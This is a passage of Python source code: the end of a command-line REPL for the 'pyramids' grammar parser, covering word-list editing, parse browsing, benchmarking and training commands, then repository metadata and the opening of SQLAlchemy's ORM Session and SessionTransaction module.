def do_add(self, line: str) -> None:
"""Adds a word to a given category's word list file."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
category = GrammarParser.parse_category(category_definition)
words_to_add = sorted(set(line[len(category_definition):].strip().split()))
if not words_to_add:
print("No words specified.")
return
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = False
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_category = GrammarParser.parse_category(filename[:-4])
if file_category != category:
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as word_set_file:
words = set(word_set_file.read().split())
for w in words_to_add:
if w in words:
print(repr(w) + " was already in " + file_path + ".")
else:
print("Adding " + repr(w) + " to " + file_path + ".")
words.add(w)
with open(file_path, 'w') as word_set_file:
word_set_file.write('\n'.join(sorted(words)))
found = True
if not found:
for folder_path in config_info.word_sets_folders:
file_path = os.path.join(folder_path, str(category) + '.ctg')
print("Creating " + file_path + ".")
with open(file_path, 'w') as word_set_file:
word_set_file.write('\n'.join(sorted(words_to_add)))
break
else:
print("No word sets folder identified. Cannot add words.")
return
self.do_reload()
def do_remove(self, line: str) -> None:
"""Removes a word from a given category's word list file."""
if not line:
print("No category specified.")
return
category_definition = line.split()[0]
words_to_remove = set(line[len(category_definition):].strip().split())
if not words_to_remove:
print("No words specified.")
return
category = GrammarParser.parse_category(category_definition)
config_info = (self._model.config_info
if self._model and self._model.config_info
else self._model_loader.load_model_config())
found = set()
for folder_path in config_info.word_sets_folders:
for filename in os.listdir(folder_path):
if not filename.lower().endswith('.ctg'):
continue
file_category = GrammarParser.parse_category(filename[:-4])
if file_category != category:
continue
file_path = os.path.join(folder_path, filename)
with open(file_path) as words_file:
words = set(words_file.read().split())
for w in sorted(words_to_remove):
if w in words:
print("Removing " + repr(w) + " from " + file_path + ".")
words.remove(w)
found.add(w)
else:
print(repr(w) + " not found in " + file_path + ".")
if words:
with open(file_path, 'w') as words_file:
words_file.write('\n'.join(sorted(words)))
else:
print("Deleting empty word list file " + file_path + ".")
os.remove(file_path)
if words_to_remove - found:
print("No file(s) found containing the following words: " +
' '.join(repr(word) for word in sorted(words_to_remove - found)) + ".")
return
self.do_reload()
def do_profile(self, line: str) -> None:
"""Profiles the execution of a command, printing the profile statistics."""
# Only a function at the module level can be profiled. To get
# around this limitation, we define a temporary module-level
# function that calls the method we want to profile.
global function_to_profile
def _function_to_profile():
self.onecmd(line)
function_to_profile = _function_to_profile
profile.run('function_to_profile()')
def do_analyze(self, line: str) -> None:
"""Analyzes the last parse and prints statistics useful for debugging."""
if line:
print("'analyze' command does not accept arguments.")
return
if self._parser_state is None:
print("Nothing to analyze.")
return
print('Covered: ' + repr(self._parser_state.is_covered()))
rule_counts, rule_nodes = self._get_rule_map()
counter = 0
for rule in sorted(rule_counts, key=rule_counts.get, reverse=True):
print(str(rule) + " (" + str(rule_counts[rule]) + " nodes)")
for node_str in sorted(ParseTreeUtils.to_str(node, simplify=True)
for node in rule_nodes[rule]):
print(' ' + node_str.replace('\n', '\n '))
counter += node_str.count('\n') + 1
if counter >= 100:
break
print("Rules in waiting:")
rule_counts = {}
for node in self._parser_state.insertion_queue:
rule_counts[node.rule] = rule_counts.get(node.rule, 0) + 1
for rule in sorted(rule_counts, key=rule_counts.get, reverse=True):
print(str(rule) + " (" + str(rule_counts[rule]) + " nodes)")
def _get_rule_map(self) -> Tuple[Dict[ParseRule, int],
Dict[ParseRule, List[TreeNodeSet]]]:
"""Collect and count the nodes, organized by rule, from the latest parse's category map."""
cat_map = self._parser_state.category_map
rule_counts = {}
rule_nodes = {}
for start, category, end in cat_map:
for node_set in cat_map.iter_node_sets(start, category, end):
for node in node_set:
rule_counts[node.rule] = rule_counts.get(node.rule, 0) + 1
rule_nodes[node.rule] = rule_nodes.get(node.rule, []) + [node]
return rule_counts, rule_nodes
def do_links(self, line: str) -> None:
"""Display the semantic net links for the current parse."""
if line:
print("'links' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
for sentence in parse.get_parse_graphs():
print(sentence)
print('')
else:
print("No parses found.")
def do_reverse(self, line: str) -> None:
"""Display token sequences that produce the same semantic net links as the current parse."""
if line:
print("'reverse' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
start_time = time.time()
sentences = list(parse.get_parse_graphs())
results = [GenerationAlgorithm().generate(self._model, sentence)
for sentence in sentences]
end_time = time.time()
for sentence, result in zip(sentences, results):
print(sentence)
print('')
for tree in sorted(result, key=lambda t: t.tokens):
text = ' '.join(tree.tokens)
text = text[:1].upper() + text[1:]
for punctuation in ',.?!:;)]}':
text = text.replace(' ' + punctuation, punctuation)
for punctuation in '([{':
text = text.replace(punctuation + ' ', punctuation)
print('"' + text + '"')
print(tree)
print('')
print('')
print("Total time: " + str(end_time - start_time) + " seconds")
print('')
else:
print("No parses found.")
def do_current(self, line: str = '') -> None:
"""Reprint the current parse for the most recent input string."""
if line:
print("'current' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
gaps = parse.total_gap_size()
size = len(parse.parse_trees)
score, confidence = parse.get_weighted_score()
print("Parses #" + str(self._parse_index + 1) + " of " +
str(self.max_parse_index + 1) + ":")
print(parse.to_str(self._simple))
print("Gaps: " + str(gaps))
print("Size: " + str(size))
print("Score: " + str(score))
print("Confidence: " + str(confidence))
print("Coverage: " + str(parse.coverage))
else:
print("No parses found.")
def do_next(self, line: str = '') -> None:
"""Print the next parse for the most recent input string."""
if line:
print("'next' command does not accept arguments.")
return
if self.parses_available:
if self._parse_index >= self.max_parse_index:
print("No more parses available.")
return
self._parse_index += 1
self.do_current()
def do_previous(self, line: str) -> None:
"""Print the previous parse for the most recent input string."""
if line:
print("'next' command does not accept arguments.")
return
if self.parses_available:
if self._parse_index <= 0:
print("No more parses available.")
return
self._parse_index -= 1
self.do_current()
def do_first(self, line: str) -> None:
"""Print the first parse for the most recent input string."""
if line:
print("'first' command does not accept arguments.")
return
self._parse_index = 0
self.do_current()
def do_last(self, line: str) -> None:
"""Print the last parse for the most recent input string."""
if line:
print("'last' command does not accept arguments.")
return
self._parse_index = self.max_parse_index
self.do_current()
def do_show(self, line: str) -> None:
"""Print the requested parse for the most recent input string."""
if len(line.split()) != 1:
print("'show' command requires a single integer argument.")
return
try:
index = int(line.strip())
except ValueError:
print("'show' command requires a single integer argument.")
return
if not (index and (-(self.parses_available + 1) <= index <= self.parses_available + 1)):
print("Index out of range.")
return
if index < 0:
index += self.parses_available + 1
else:
index -= 1
self._parse_index = index
self.do_current()
def do_gaps(self, line: str) -> None:
"""Print the gaps in the current parse."""
if line:
print("'gaps' command does not accept arguments.")
return
if self.parses_available:
parse = self._parses[self._parse_index]
print("Gaps: " + str(parse.total_gap_size()))
for start, end in parse.iter_gaps():
print(' ' + str(start) + ' to ' + str(end) + ': ' +
' '.join(parse.tokens[start:end]))
else:
print("No parses found.")
def do_best(self, line: str) -> None:
"""Adjust the score upward for the most recently printed parse until it
is higher than all others returned."""
if line:
print("'best' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
best_parse = self._parses[self._parse_index]
for _ in range(100):
self._parses[self._parse_index].adjust_score(True)
ranks = {}
for parse in self._parses:
ranks[parse] = parse.get_rank()
self._parses.sort(key=ranks.get, reverse=True)
self._parse_index = [id(parse) for parse in self._parses].index(id(best_parse))
if (self._parses[0] is best_parse or
(len(self._parses[self._parse_index - 1].parse_trees)
!= len(best_parse.parse_trees)) or
(self._parses[self._parse_index - 1].total_gap_size()
!= best_parse.total_gap_size())):
break
if self._parse_index == 0:
print("Successfully made this parse the highest ranked.")
else:
print("Failed to make this parse the highest ranked.")
def do_worst(self, line: str) -> None:
"""Adjust the score downward for the most recently printed parse until
it is lower than all others returned."""
if line:
print("'worst' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
worst_parse = self._parses[self._parse_index]
for _ in range(100):
self._parses[self._parse_index].adjust_score(False)
ranks = {}
for parse in self._parses:
ranks[parse] = parse.get_rank()
self._parses.sort(key=ranks.get, reverse=True)
self._parse_index = [id(parse) for parse in self._parses].index(id(worst_parse))
if (self._parses[-1] is worst_parse or
(len(self._parses[self._parse_index + 1].parse_trees)
!= len(worst_parse.parse_trees)) or
(self._parses[self._parse_index + 1].total_gap_size()
!= worst_parse.total_gap_size())):
break
if self._parse_index == self.max_parse_index:
print("Successfully made this parse the lowest ranked.")
else:
print("Failed to make this parse the lowest ranked.")
def do_good(self, line: str) -> None:
"""Adjust the score upward for the most recently printed parse."""
if line:
print("'next' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
self._parses[self._parse_index].adjust_score(True)
def do_bad(self, line: str) -> None:
"""Adjust the score downward for the most recently printed parse."""
if line:
print("'next' command does not accept arguments.")
return
if not self._parses:
print("No parses available for adjustment.")
return
self._parses[self._parse_index].adjust_score(False)
def _get_benchmark_parser_output(self) -> str:
parse = self._parses[self._parse_index]
result = set()
for sentence in parse.get_parse_graphs():
result.add(str(sentence))
return '\n'.join(sorted(result))
def do_keep(self, line: str) -> None:
"""Save the current parse as benchmark case."""
if line:
print("'keep' command does not accept arguments.")
return
if not self._parses:
print("No parses available.")
return
assert self._benchmark is not None
self._benchmark[Input(self.last_input_text)] = Target(self._get_benchmark_parser_output())
self._benchmark_dirty = True
# noinspection PyUnusedLocal
def _test_attempt_iterator(self, text: Input, target: Target) -> Iterator[Tuple[Attempt, None]]:
start_time = time.time()
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(text, start_time + self._timeout_interval)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
yield Attempt(self._get_benchmark_parser_output()), None
# noinspection PyUnusedLocal
def _report_benchmark_progress(self, result: Result) -> None:
assert self._benchmark is not None
self._benchmark_tests_completed += 1
if time.time() >= self._benchmark_update_time + 1:
print("Benchmark " +
str(round((100 * self._benchmark_tests_completed / float(len(self._benchmark))),
ndigits=1)) +
"% complete...")
self._benchmark_update_time = time.time()
def do_benchmark(self, line: str) -> None:
"""Parse all benchmark samples and report statistics on them as a batch."""
if line:
print("'benchmark' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
failures = [] # type: List[Failure]
tally = ModelBatchController(self._validate_output)\
.run_batch(self._benchmark, self._test_attempt_iterator,
self._report_benchmark_progress, failures.append)
print("")
if failures:
print('')
print("Failures:")
for failure in failures:
print(failure.input)
print(failure.first_attempt)
print(failure.target)
print('')
print("Score: " + str(round(100 * tally.avg_first_attempt_score, 1)) + "%")
print("Average Parse Time: " + str(round(self._benchmark_time / float(len(self._benchmark)),
ndigits=1)) +
' seconds per parse')
print("Samples Evaluated: " + str(len(self._benchmark)))
print("Emergency Disambiguations: " + str(self._benchmark_emergency_disambiguations) +
" (" + str(round(100 * self._benchmark_emergency_disambiguations
/ float(len(self._benchmark)), ndigits=1)) + '%)')
print("Parse Timeouts: " + str(self._benchmark_parse_timeouts) + " (" +
str(round(100 * self._benchmark_parse_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
print("Disambiguation Timeouts: " + str(self._benchmark_disambiguation_timeouts) + " (" +
str(round(100 * self._benchmark_disambiguation_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
def _scoring_function(self, target: float) -> None:
# NOTE: It is important that positive reinforcement not
# occur if the first try gives the right answer and
# the score is already >= .9; otherwise, it will
# throw off the relative scoring of other parses.
if (not target or self._parse_index or
self._parses[self._parse_index].get_weighted_score()[0] < .9):
self._parses[self._parse_index].adjust_score(target)
def _training_attempt_iterator(self, text: Input,
target: Target) -> Iterator[Tuple[Attempt, FeedbackReceiver]]:
print(text)
# Restrict it to the correct category and token_start_index from there. This gives the
# parser a leg up when it's far from the correct response.
split_index = target.index(':')
target_category = GrammarParser.parse_category(target[:split_index])
start_time = time.time()
end_time = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = \
self._do_parse(text, end_time, restriction_category=target_category)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
# We shouldn't keep going if there are no parses of the correct category. This most likely
# indicates a change in the grammar, not a problem with the model.
assert self.parses_available
while self._parse_index <= self.max_parse_index:
# (benchmark target, scoring function)
yield self._get_benchmark_parser_output(), self._scoring_function
self._parse_index += 1
# Now try it without any help,
start_time = time.time()
end_time = start_time + self._timeout_interval
emergency_disambig, parse_timed_out, disambig_timed_out = self._do_parse(text, end_time)
end_time = time.time()
self._benchmark_emergency_disambiguations += int(emergency_disambig)
self._benchmark_parse_timeouts += int(parse_timed_out)
self._benchmark_disambiguation_timeouts += int(disambig_timed_out)
self._benchmark_time += end_time - start_time
if self.parses_available:
while self._parse_index <= self.max_parse_index:
# (benchmark target, scoring function)
yield self._get_benchmark_parser_output(), self._scoring_function
self._parse_index += 1
@staticmethod
def _validate_output(output_val: str, target: str) -> bool:
if ':' not in output_val:
return False
split_index = target.index(':')
target_category = GrammarParser.parse_category(target[:split_index])
target_structure = target[split_index:]
split_index = output_val.index(':')
output_category = GrammarParser.parse_category(output_val[:split_index])
output_structure = output_val[split_index:]
return output_category in target_category and target_structure == output_structure
def do_train(self, line: str) -> None:
"""Automatically adjust scoring to improve benchmark statistics."""
if line:
print("'train' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
self._benchmark_emergency_disambiguations = 0
self._benchmark_parse_timeouts = 0
self._benchmark_disambiguation_timeouts = 0
self._benchmark_time = 0.0
self._benchmark_tests_completed = 0
self._benchmark_update_time = time.time()
failures = [] # type: List[Failure]
tally = ModelBatchController(self._validate_output)\
.run_batch(self._benchmark, self._training_attempt_iterator,
self._report_benchmark_progress, failures.append)
print("")
if failures:
print('')
print("Failures:")
for failure in failures:
print(failure.input)
print(failure.first_attempt)
print(failure.target)
print('')
print("Score: " + str(round(100 * tally.avg_first_attempt_score, 1)) + "%")
print("Average Parse Time: " + str(round(self._benchmark_time / float(len(self._benchmark)),
ndigits=1)) +
' seconds per parse')
print("Samples Evaluated: " + str(len(self._benchmark)))
print("Emergency Disambiguations: " + str(self._benchmark_emergency_disambiguations) +
" (" + str(round(100 * self._benchmark_emergency_disambiguations
/ float(len(self._benchmark)), ndigits=1)) + '%)')
print("Parse Timeouts: " + str(self._benchmark_parse_timeouts) + " (" +
str(round(100 * self._benchmark_parse_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
print("Disambiguation Timeouts: " + str(self._benchmark_disambiguation_timeouts) + " (" +
str(round(100 * self._benchmark_disambiguation_timeouts / float(len(self._benchmark)),
ndigits=1)) + '%)')
def do_training(self, line: str) -> None:
"""Repeatedly train and save until user hits Ctrl-C."""
if line:
print("'training' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
iteration = 0
while True:
try:
iteration += 1
print("Iteration:", iteration)
self.do_train('')
self.do_save('')
except KeyboardInterrupt:
self.do_save('')
break
def do_list(self, line: str) -> None:
"""List all benchmark samples."""
if line:
print("'list' command does not accept arguments.")
return
if not self._benchmark:
print("No benchmarking samples.")
return
print(str(len(self._benchmark)) + " recorded benchmark samples:")
max_tokens = 0
total_tokens = 0
for input_val in sorted(self._benchmark):
print(" " + input_val)
count = len(list(self._model.tokenizer.tokenize(input_val)))
total_tokens += count
if count > max_tokens:
max_tokens = count
print('')
print("Longest benchmark sample: " + str(max_tokens) + " tokens")
print("Average benchmark sample length: " +
str(round(total_tokens / float(len(self._benchmark)), ndigits=1)) + " tokens")
def do_visualize(self, line: str) -> None:
"""Visualize the most recent parse."""
if line:
print("'visualize' command does not accept arguments.")
return
if Digraph is None:
print('The graphviz library is not installed.')
return
if self.parses_available:
parse = self._parses[self._parse_index]
gv_graph = Digraph()
for graph in parse.get_parse_graphs():
with gv_graph.subgraph() as subgraph:
graph.visualize(subgraph)
gv_graph.view()
else:
print("No parses found.")
def do_emergency(self, line: str) -> None:
"""Set, clear, or display the emergency parsing mode flag."""
line = line.strip()
if line == 'on':
self._emergency_mode = True
print("Emergency mode is on.")
elif line == 'off':
self._emergency_mode = False
print("Emergency mode is off.")
elif not line:
print('Emergency mode is %s.' % ('on' if self._emergency_mode else 'off'))
else:
print('Unexpected argument: ' + line)
def repl(model_loader: ModelLoader) -> None:
"""Run the interactive command line interface to the parser."""
parser_cmd = ParserCmd(model_loader)
print('')
parser_cmd.cmdloop()
|
{
"content_hash": "5a31d5d9d2961b2745f5ccd028e40273",
"timestamp": "",
"source": "github",
"line_count": 1065,
"max_line_length": 100,
"avg_line_length": 42.12769953051643,
"alnum_prop": 0.5585967102037177,
"repo_name": "hosford42/pyramids",
"id": "76223d37da5ca5ce8fac6c9aa23a7fce439112ed",
"size": "44933",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyramids/repl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "266486"
}
],
"symlink_target": ""
}
|
"""Provides the Session class and related utilities."""
import weakref
from .. import util, sql, engine, exc as sa_exc
from ..sql import util as sql_util, expression
from . import (
SessionExtension, attributes, exc, query,
loading, identity
)
from ..inspection import inspect
from .base import (
object_mapper, class_mapper,
_class_to_mapper, _state_mapper, object_state,
_none_set, state_str, instance_str
)
from .unitofwork import UOWTransaction
from . import state as statelib
import sys
__all__ = ['Session', 'SessionTransaction', 'SessionExtension', 'sessionmaker']
_sessions = weakref.WeakValueDictionary()
"""Weak-referencing dictionary of :class:`.Session` objects.
"""
def _state_session(state):
"""Given an :class:`.InstanceState`, return the :class:`.Session`
associated, if any.
"""
if state.session_id:
try:
return _sessions[state.session_id]
except KeyError:
pass
return None
class _SessionClassMethods(object):
"""Class-level methods for :class:`.Session`, :class:`.sessionmaker`."""
@classmethod
def close_all(cls):
"""Close *all* sessions in memory."""
for sess in _sessions.values():
sess.close()
@classmethod
@util.dependencies("sqlalchemy.orm.util")
def identity_key(cls, orm_util, *args, **kwargs):
"""Return an identity key.
This is an alias of :func:`.util.identity_key`.
"""
return orm_util.identity_key(*args, **kwargs)
@classmethod
def object_session(cls, instance):
"""Return the :class:`.Session` to which an object belongs.
This is an alias of :func:`.object_session`.
"""
return object_session(instance)
ACTIVE = util.symbol('ACTIVE')
PREPARED = util.symbol('PREPARED')
COMMITTED = util.symbol('COMMITTED')
DEACTIVE = util.symbol('DEACTIVE')
CLOSED = util.symbol('CLOSED')
class SessionTransaction(object):
"""A :class:`.Session`-level transaction.
:class:`.SessionTransaction` is a mostly behind-the-scenes object
not normally referenced directly by application code. It coordinates
among multiple :class:`.Connection` objects, maintaining a database
transaction for each one individually, committing or rolling them
back all at once. It also provides optional two-phase commit behavior
which can augment this coordination operation.
The :attr:`.Session.transaction` attribute of :class:`.Session`
refers to the current :class:`.SessionTransaction` object in use, if any.
A :class:`.SessionTransaction` is associated with a :class:`.Session`
in its default mode of ``autocommit=False`` immediately, associated
with no database connections. As the :class:`.Session` is called upon
to emit SQL on behalf of various :class:`.Engine` or :class:`.Connection`
objects, a corresponding :class:`.Connection` and associated
:class:`.Transaction` is added to a collection within the
:class:`.SessionTransaction` object, becoming one of the
connection/transaction pairs maintained by the
:class:`.SessionTransaction`.
The lifespan of the :class:`.SessionTransaction` ends when the
:meth:`.Session.commit`, :meth:`.Session.rollback` or
:meth:`.Session.close` methods are called. At this point, the
:class:`.SessionTransaction` removes its association with its parent
:class:`.Session`. A :class:`.Session` that is in ``autocommit=False``
mode will create a new :class:`.SessionTransaction` to replace it
immediately, whereas a :class:`.Session` that's in ``autocommit=True``
mode will remain without a :class:`.SessionTransaction` until the
:meth:`.Session.begin` method is called.
Another detail of :class:`.SessionTransaction` behavior is that it is
capable of "nesting". This means that the :meth:`.Session.begin` method
can be called while an existing :class:`.SessionTransaction` is already
present, producing a new :class:`.SessionTransaction` that temporarily
replaces the parent :class:`.SessionTransaction`. When a
:class:`.SessionTransaction` is produced as nested, it assigns itself to
the :attr:`.Session.transaction` attribute. When it is ended via
:meth:`.Session.commit` or :meth:`.Session.rollback`, it restores its
parent :class:`.SessionTransaction` back onto the
:attr:`.Session.transaction` attribute. The behavior is effectively a
stack, where :attr:`.Session.transaction` refers to the current head of
the stack.
The purpose of this stack is to allow nesting of
:meth:`.Session.rollback` or :meth:`.Session.commit` calls in context
with various flavors of :meth:`.Session.begin`. This nesting behavior
applies to when :meth:`.Session.begin_nested` is used to emit a
SAVEPOINT transaction, and is also used to produce a so-called
"subtransaction" which allows a block of code to use a
begin/rollback/commit sequence regardless of whether or not its enclosing
code block has begun a transaction. The :meth:`.flush` method, whether
called explicitly or via autoflush, is the primary consumer of the
"subtransaction" feature, in that it wishes to guarantee that it works
within in a transaction block regardless of whether or not the
:class:`.Session` is in transactional mode when the method is called.
See also:
:meth:`.Session.rollback`
:meth:`.Session.commit`
:meth:`.Session.begin`
:meth:`.Session.begin_nested`
:attr:`.Session.is_active`
:meth:`.SessionEvents.after_commit`
:meth:`.SessionEvents.after_rollback`
:meth:`.SessionEvents.after_soft_rollback`
"""
_rollback_exception = None
def __init__(self, session, parent=None, nested=False):
self.session = session
self._connections = {}
self._parent = parent
self.nested = nested
self._state = ACTIVE
if not parent and nested:
raise sa_exc.InvalidRequestError(
"Can't start a SAVEPOINT transaction when no existing "
"transaction is in progress")
if self.session._enable_transaction_accounting:
self._take_snapshot()
if self.session.dispatch.after_transaction_create:
self.session.dispatch.after_transaction_create(self.session, self)
@property
def is_active(self):
return self.session is not None and self._state is ACTIVE
def _assert_active(self, prepared_ok=False,
rollback_ok=False,
deactive_ok=False,
closed_msg="This transaction is closed"):
if self._state is COMMITTED:
raise sa_exc.InvalidRequestError(
"This session is in 'committed' state; no further "
"SQL can be emitted within this transaction."
)
elif self._state is PREPARED:
if not prepared_ok:
raise sa_exc.InvalidRequestError(
"This session is in 'prepared' state; no further "
"SQL can be emitted within this transaction."
)
elif self._state is DEACTIVE:
if not deactive_ok and not rollback_ok:
if self._rollback_exception:
raise sa_exc.InvalidRequestError(
"This Session's transaction has been rolled back "
"due to a previous exception during flush."
" To begin a new transaction with this Session, "
"first issue Session.rollback()."
" Original exception was: %s"
% self._rollback_exception
)
elif not deactive_ok:
raise sa_exc.InvalidRequestError(
"This Session's transaction has been rolled back "
"by a nested rollback() call. To begin a new "
"transaction, issue Session.rollback() first."
)
elif self._state is CLOSED:
raise sa_exc.ResourceClosedError(closed_msg)
@property
def _is_transaction_boundary(self):
return self.nested or not self._parent
def connection(self, bindkey, **kwargs):
self._assert_active()
bind = self.session.get_bind(bindkey, **kwargs)
return self._connection_for_bind(bind)
def _begin(self, nested=False):
self._assert_active()
return SessionTransaction(
self.session, self, nested=nested)
def _iterate_parents(self, upto=None):
if self._parent is upto:
return (self,)
else:
if self._parent is None:
raise sa_exc.InvalidRequestError(
"Transaction %s is not on the active transaction list" % (
upto))
return (self,) + self._parent._iterate_parents(upto)
def _take_snapshot(self):
if not self._is_transaction_boundary:
self._new = self._parent._new
self._deleted = self._parent._deleted
self._dirty = self._parent._dirty
self._key_switches = self._parent._key_switches
return
if not self.session._flushing:
self.session.flush()
self._new = weakref.WeakKeyDictionary()
self._deleted = weakref.WeakKeyDictionary()
self._dirty = weakref.WeakKeyDictionary()
self._key_switches = weakref.WeakKeyDictionary()
def _restore_snapshot(self, dirty_only=False):
assert self._is_transaction_boundary
for s in set(self._new).union(self.session._new):
self.session._expunge_state(s)
if s.key:
del s.key
for s, (oldkey, newkey) in self._key_switches.items():
self.session.identity_map.discard(s)
s.key = oldkey
self.session.identity_map.replace(s)
for s in set(self._deleted).union(self.session._deleted):
if s.deleted:
#assert s in self._deleted
del s.deleted
self.session._update_impl(s, discard_existing=True)
assert not self.session._deleted
for s in self.session.identity_map.all_states():
if not dirty_only or s.modified or s in self._dirty:
s._expire(s.dict, self.session.identity_map._modified)
def _remove_snapshot(self):
assert self._is_transaction_boundary
if not self.nested and self.session.expire_on_commit:
for s in self.session.identity_map.all_states():
s._expire(s.dict, self.session.identity_map._modified)
for s in self._deleted:
s.session_id = None
self._deleted.clear()
def _connection_for_bind(self, bind):
self._assert_active()
if bind in self._connections:
return self._connections[bind][0]
if self._parent:
conn = self._parent._connection_for_bind(bind)
if not self.nested:
return conn
else:
if isinstance(bind, engine.Connection):
conn = bind
if conn.engine in self._connections:
raise sa_exc.InvalidRequestError(
"Session already has a Connection associated for the "
"given Connection's Engine")
else:
conn = bind.contextual_connect()
if self.session.twophase and self._parent is None:
transaction = conn.begin_twophase()
elif self.nested:
transaction = conn.begin_nested()
else:
transaction = conn.begin()
self._connections[conn] = self._connections[conn.engine] = \
(conn, transaction, conn is not bind)
self.session.dispatch.after_begin(self.session, self, conn)
return conn
def prepare(self):
if self._parent is not None or not self.session.twophase:
raise sa_exc.InvalidRequestError(
"'twophase' mode not enabled, or not root transaction; "
"can't prepare.")
self._prepare_impl()
def _prepare_impl(self):
self._assert_active()
if self._parent is None or self.nested:
self.session.dispatch.before_commit(self.session)
stx = self.session.transaction
if stx is not self:
for subtransaction in stx._iterate_parents(upto=self):
subtransaction.commit()
if not self.session._flushing:
for _flush_guard in range(100):
if self.session._is_clean():
break
self.session.flush()
else:
raise exc.FlushError(
"Over 100 subsequent flushes have occurred within "
"session.commit() - is an after_flush() hook "
"creating new objects?")
if self._parent is None and self.session.twophase:
try:
for t in set(self._connections.values()):
t[1].prepare()
except:
with util.safe_reraise():
self.rollback()
self._state = PREPARED
def commit(self):
self._assert_active(prepared_ok=True)
if self._state is not PREPARED:
self._prepare_impl()
if self._parent is None or self.nested:
for t in set(self._connections.values()):
t[1].commit()
self._state = COMMITTED
self.session.dispatch.after_commit(self.session)
if self.session._enable_transaction_accounting:
self._remove_snapshot()
self.close()
return self._parent
def rollback(self, _capture_exception=False):
self._assert_active(prepared_ok=True, rollback_ok=True)
stx = self.session.transaction
if stx is not self:
for subtransaction in stx._iterate_parents(upto=self):
subtransaction.close()
if self._state in (ACTIVE, PREPARED):
for transaction in self._iterate_parents():
if transaction._parent is None or transaction.nested:
transaction._rollback_impl()
transaction._state = DEACTIVE
break
else:
transaction._state = DEACTIVE
sess = self.session
if self.session._enable_transaction_accounting and \
not sess._is_clean():
# if items were added, deleted, or mutated
# here, we need to re-restore the snapshot
util.warn(
"Session's state has been changed on "
"a non-active transaction - this state "
"will be discarded.")
self._restore_snapshot(dirty_only=self.nested)
self.close()
if self._parent and _capture_exception:
self._parent._rollback_exception = sys.exc_info()[1]
sess.dispatch.after_soft_rollback(sess, self)
return self._parent
def _rollback_impl(self):
for t in set(self._connections.values()):
t[1].rollback()
if self.session._enable_transaction_accounting:
self._restore_snapshot(dirty_only=self.nested)
self.session.dispatch.after_rollback(self.session)
def close(self):
self.session.transaction = self._parent
if self._parent is None:
for connection, transaction, autoclose in \
set(self._connections.values()):
if autoclose:
connection.close()
else:
transaction.close()
self._state = CLOSED
if self.session.dispatch.after_transaction_end:
self.session.dispatch.after_transaction_end(self.session, self)
if self._parent is None:
if not self.session.autocommit:
self.session.begin()
self.session = None
self._connections = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self._assert_active(deactive_ok=True, prepared_ok=True)
if self.session.transaction is None:
return
if type is None:
try:
self.commit()
except:
with util.safe_reraise():
self.rollback()
else:
self.rollback()
class Session(_SessionClassMethods):
"""Manages persistence operations for ORM-mapped objects.
The Session's usage paradigm is described at :doc:`/orm/session`.
"""
public_methods = (
'__contains__', '__iter__', 'add', 'add_all', 'begin', 'begin_nested',
'close', 'commit', 'connection', 'delete', 'execute', 'expire',
'expire_all', 'expunge', 'expunge_all', 'flush', 'get_bind',
'is_modified',
'merge', 'query', 'refresh', 'rollback',
'scalar')
def __init__(self, bind=None, autoflush=True, expire_on_commit=True,
_enable_transaction_accounting=True,
autocommit=False, twophase=False,
weak_identity_map=True, binds=None, extension=None,
info=None,
query_cls=query.Query):
"""Construct a new Session.
See also the :class:`.sessionmaker` function which is used to
generate a :class:`.Session`-producing callable with a given
set of arguments.
:param autocommit:
.. warning::
The autocommit flag is **not for general use**, and if it is used,
queries should only be invoked within the span of a
:meth:`.Session.begin` / :meth:`.Session.commit` pair. Executing
queries outside of a demarcated transaction is a legacy mode
of usage, and can in some cases lead to concurrent connection
checkouts.
Defaults to ``False``. When ``True``, the
:class:`.Session` does not keep a persistent transaction running, and
will acquire connections from the engine on an as-needed basis,
returning them immediately after their use. Flushes will begin and
commit (or possibly rollback) their own transaction if no
transaction is present. When using this mode, the
:meth:`.Session.begin` method is used to explicitly start
transactions.
.. seealso::
:ref:`session_autocommit`
:param autoflush: When ``True``, all query operations will issue a
``flush()`` call to this ``Session`` before proceeding. This is a
convenience feature so that ``flush()`` need not be called
repeatedly in order for database queries to retrieve results. It's
typical that ``autoflush`` is used in conjunction with
``autocommit=False``. In this scenario, explicit calls to
``flush()`` are rarely needed; you usually only need to call
``commit()`` (which flushes) to finalize changes.
:param bind: An optional ``Engine`` or ``Connection`` to which this
``Session`` should be bound. When specified, all SQL operations
performed by this session will execute via this connectable.
:param binds: An optional dictionary which contains more granular
"bind" information than the ``bind`` parameter provides. This
dictionary can map individual ``Table`` instances as well as
``Mapper`` instances to individual ``Engine`` or ``Connection``
objects. Operations which proceed relative to a particular
